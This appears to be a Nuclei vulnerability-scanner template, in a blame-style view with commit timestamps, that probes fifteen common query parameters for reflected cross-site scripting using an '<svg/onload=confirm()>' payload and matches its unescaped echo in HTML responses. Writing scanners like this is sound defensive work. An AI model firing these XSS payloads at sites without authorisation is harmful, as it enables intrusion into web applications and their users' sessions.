2021-01-09 13:02:04 +00:00
|
|
|
id: top-xss-params
|
2020-08-15 08:48:23 +00:00
|
|
|
|
|
|
|
|
info:
|
2021-05-07 09:51:59 +00:00
|
|
|
name: Top 15 XSS Parameter Check
|
2020-11-03 18:00:38 +00:00
|
|
|
author: foulenzer & geeknik
|
2020-08-15 08:48:23 +00:00
|
|
|
severity: medium
|
|
|
|
|
description: Searches for reflected XSS in the server response via GET-requests.
|
2021-02-12 05:53:01 +00:00
|
|
|
tags: xss
|
2021-04-06 08:15:46 +00:00
|
|
|
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p
|
2020-08-15 08:48:23 +00:00
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
2021-05-07 09:51:59 +00:00
|
|
|
- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E"
|
2021-04-06 08:15:46 +00:00
|
|
|
|
2020-11-03 18:00:38 +00:00
|
|
|
redirects: true
|
|
|
|
|
max-redirects: 1
|
2020-09-04 07:49:39 +00:00
|
|
|
matchers-condition: and
|
2020-08-15 08:48:23 +00:00
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
2021-05-07 09:51:59 +00:00
|
|
|
- "\"<svg/onload=confirm('q')>"
|
|
|
|
|
- "\"<svg/onload=confirm('s')>"
|
|
|
|
|
- "\"<svg/onload=confirm('search')>"
|
|
|
|
|
- "\"<svg/onload=confirm('id')>"
|
|
|
|
|
- "\"<svg/onload=confirm('action')>"
|
|
|
|
|
- "\"<svg/onload=confirm('keyword')>"
|
|
|
|
|
- "\"<svg/onload=confirm('query')>"
|
|
|
|
|
- "\"<svg/onload=confirm('page')>"
|
|
|
|
|
- "\"<svg/onload=confirm('keywords')>"
|
|
|
|
|
- "\"<svg/onload=confirm('url')>"
|
|
|
|
|
- "\"<svg/onload=confirm('view')>"
|
|
|
|
|
- "\"<svg/onload=confirm('cat')>"
|
|
|
|
|
- "\"<svg/onload=confirm('name')>"
|
|
|
|
|
- "\"<svg/onload=confirm('key')>"
|
|
|
|
|
- "\"<svg/onload=confirm('p')>"
|
2020-09-04 07:46:30 +00:00
|
|
|
part: body
|
2021-05-07 09:51:59 +00:00
|
|
|
condition: or
|
2020-11-26 17:59:40 +00:00
|
|
|
|
2020-09-04 07:46:30 +00:00
|
|
|
- type: word
|
|
|
|
|
words:
|
2020-12-02 04:31:03 +00:00
|
|
|
- "text/html"
|
2020-11-03 18:00:38 +00:00
|
|
|
part: header
|
2021-01-11 06:44:22 +00:00
|
|
|
|
2021-05-10 18:20:48 +00:00
|
|
|
- type: word
|
|
|
|
|
words:
|
|
|
|
|
- "<title>Access Denied</title>"
|
|
|
|
|
- "You don't have permission to access"
|
|
|
|
|
part: body
|
|
|
|
|
condition: and
|
|
|
|
|
negative: true
|
|
|
|
|
|
2021-01-11 06:44:22 +00:00
|
|
|
- type: status
|
|
|
|
|
status:
|
2021-05-06 12:55:40 +00:00
|
|
|
- 200
|
